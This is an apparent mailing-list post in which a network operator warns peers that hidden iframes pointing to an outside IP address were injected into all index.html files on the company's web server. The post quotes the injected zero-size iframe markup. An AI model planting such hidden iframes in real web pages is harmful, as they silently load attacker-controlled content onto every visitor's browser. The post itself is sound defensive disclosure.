Malicious code just found on web server

• Previous message (by thread): IXP
• Next message (by thread): Malicious code just found on web server
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:
 
src="http://77.92.158.122/webmail/inc/web/index.php"
style="display: none;" height="0" width="0"></iframe> 
<iframe src="http://77.92.158.122/webmail/inc/web/index.php"
style="display: none;" height="0" width="0"></iframe> </body> </html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.

Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
berg at wins.net
715-832-3726

• Previous message (by thread): IXP
• Next message (by thread): Malicious code just found on web server
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]